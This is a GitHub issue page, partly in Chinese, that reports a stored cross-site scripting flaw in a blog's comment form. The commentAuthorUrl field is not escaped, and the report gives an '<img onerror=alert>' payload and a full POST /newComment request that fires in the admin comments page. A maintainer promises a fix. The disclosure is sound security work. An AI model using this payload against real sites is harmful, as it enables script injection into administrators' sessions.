Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
我确定我已经查看了 (标注[ ]为[x])
[ ]
[x]
我要申请 (标注[ ]为[x])
I find that You have do HtmlUtil.escape for CommentContent but do nothing with CommentAuthorUrl
payload:commentAuthorUrl="><img src=1 onerror=alert(123)>
commentAuthorUrl="><img src=1 onerror=alert(123)>
POST /newComment HTTP/1.1 Host: xxxxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 306 Connection: close Cookie: JSESSIONID= X-Forwarded-For: 127.0.0.2 postId=3&commentContent=sasas&commentAuthor=as12%22%3E%3Ca%3E3&commentAuthorEmail=&commentAuthorUrl=%22%3E%3Cimg+src%3D1+onerror%3Dalert(123)%3E233&commentAgent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F73.0.3683.47+Safari%2F537.36&commentParent=28
in uri /admin/comments?status=1
/admin/comments?status=1
The text was updated successfully, but these errors were encountered:
非常感谢您的漏洞反馈!我们将在 v1.0 版本进行修复。
Sorry, something went wrong.
准备发布 v1,所以关闭该 issue。
No branches or pull requests
我确定我已经查看了 (标注
[ ]为[x])我要申请 (标注
[ ]为[x])Bug Report
I find that You have do HtmlUtil.escape for CommentContent


but do nothing with CommentAuthorUrl
payload:

commentAuthorUrl="><img src=1 onerror=alert(123)>in uri

/admin/comments?status=1The text was updated successfully, but these errors were encountered: